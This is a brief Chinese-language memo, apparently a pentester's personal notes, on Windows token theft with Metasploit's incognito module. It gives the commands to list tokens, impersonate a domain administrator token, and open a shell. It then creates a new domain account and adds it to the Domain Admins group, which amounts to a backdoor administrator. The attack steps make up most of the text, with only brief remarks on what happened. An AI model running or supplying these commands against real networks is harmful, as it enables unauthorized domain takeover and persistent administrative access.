令牌窃取


一、列举令牌

msf中只有获取到管理员权限才能列举其他令牌(可能是因为系统本版问题,反正我试了很多次都只有管理员权限才能)

use incognito 
list_tokens -u

二、假冒令牌

假冒令牌XF域的管理员令牌
impersonate_token XF\\administrator

三、进入交互式shell,添加域账户

在交互式shell中命令成功执行了,添加到域管理员组中了,但是在交互式shell中用命令查找用户查找不到,在域控中可以查看到

进入交互式
shell
添加域用户
net user test 1234.com /add /domain
加入域管理员组
net group "domain admins" test /add /domain